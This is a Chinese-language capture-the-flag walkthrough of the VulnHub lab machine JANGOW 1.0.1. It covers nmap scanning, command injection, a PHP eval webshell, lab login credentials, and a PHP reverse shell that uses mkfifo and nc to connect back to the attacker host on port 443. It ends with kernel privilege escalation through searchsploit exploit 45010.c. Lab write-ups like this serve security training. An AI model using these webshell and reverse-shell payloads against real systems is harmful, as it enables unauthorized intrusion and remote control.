JANGOW: 1.0.1

前期准备：

靶机下载地址：https://www.vulnhub.com/entry/jangow-101,754/、

kali攻击机IP：192.168.1.130
靶机地址：192.168.1.139

一、信息收集

1.使用nmap扫描靶机地址

nmap -p 1-65535 -A -sV 192.168.1.139

发现开放了21和80端口，查看一下80端口。

2.收集网站信息

检查页面后发现Buscar页面有个可疑的地方：

做一下测试：

发现可以执行系统指令。

二、漏洞攻击

直接写入一句话木马试一下：

echo '<?php eval($_POST["sain"]);' > sain.php

返回200，用蚁剑链接一下：

连接成功。简单查看一下文件，在/var/www/html/site/wordpress下也发现了配置文件：

除此之外发现在/var/www/html下有一个./backup文件：

发现都是数据库的用户名和密码，但是jangow01和系统名字一样，所以我就尝试下直接登录系统，发现可以直接登陆进去：

username = "jangow01"
password = "abygurl69"

可以直接在系统里进行提权做，但是通常是写入反弹shell连接，然后发现 nc 中的 -e 参数无法使用

除此之外也尝试了好几种反弹shell，发现存在端口限制，试了好几个端口后发现443端口能用，因为网站使用的是php语言，所以写入一个php反弹shell文件：

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.130 443 >/tmp/f');?>

kali上开启监听，并且访问 反弹shell的php文件：

发现连接成功，写入交互式shell，要使用python3：

python3 -c 'import pty;pty.spawn("/bin/bash")'

在home目录下发现一个user.txt文件：

用md5解不出来，然后查看一下系统版本，看看有没有可利用的漏洞：

三、提权

靶机环境是ubuntu16.04，使用 searchsploit 看看有没有什么可利用的漏洞

试了好几个后发现 45010.c 可以利用，把45010.c文件传送到靶机中，我这开个http服务：

赋一下权限（一开始我用的 jangow01 用户做的，发现无法赋权，后来试了下 www-data 可以）：

先用 gcc 运行一下45010.c文件：

生成一个 a.out 文件，运行a.out文件，得到root权限，查看flag：